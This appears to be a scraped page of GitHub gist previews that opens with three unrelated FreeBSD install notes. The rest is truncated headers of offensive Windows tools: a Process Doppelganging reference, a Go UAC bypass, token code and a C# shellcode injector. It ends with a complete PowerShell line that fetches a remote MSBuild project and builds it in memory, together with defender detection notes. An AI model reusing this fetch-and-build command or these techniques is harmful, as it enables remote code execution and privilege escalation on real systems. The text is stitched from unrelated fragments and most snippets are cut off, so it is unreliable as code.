- Install 12.0 (or later)
- Install drm-next-kmod from ports - do not install xf86-video-intel
- Recognized by default, need to enable iwm in rc.conf
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // | |
| #include <Windows.h> |
| package main | |
| import ( | |
| "io/ioutil" | |
| "log" | |
| "net/http" | |
| "os" | |
| "runtime" | |
| "syscall" | |
| "unsafe" |
| // UAC bypass ported from https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation/blob/master/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp | |
| package main | |
| import ( | |
| "syscall" | |
| "time" | |
| "unsafe" | |
| "golang.org/x/sys/windows/registry" | |
| ) |
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "os/exec" | |
| "syscall" | |
| "time" | |
| "unsafe" | |
| ) |
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| // getInfo retrieves a specified type of information about an access token. |
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Win32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
# Loads and builds an MSBuild project inside the current PowerShell process:
#   1. loads the Microsoft.Build assembly (LoadWithPartialName is an obsolete .NET API);
#   2. opens an XmlReader directly on a remote gist URL - nothing in this snippet writes
#      the project XML to disk;
#   3. wraps the reader in Microsoft.Build.Evaluation.Project and calls Build().
# Security note: building a project runs whatever targets and tasks its XML defines, so the
# remote file decides what executes in this process. test.csproj is not shown on this page;
# treat its content as untrusted. The URL is pinned to one gist revision, which fixes the
# content fetched but does not make it trustworthy.
# Defender view: look for Microsoft.Build being loaded into a PowerShell host, the type name
# Microsoft.Build.Evaluation.Project in script block logs (event 4104), and an outbound HTTPS
# request from that process. Constrained Language Mode enforced through WDAC/AppLocker is
# expected to block these .NET calls - verify in your own environment.
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj"); | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.Build(); |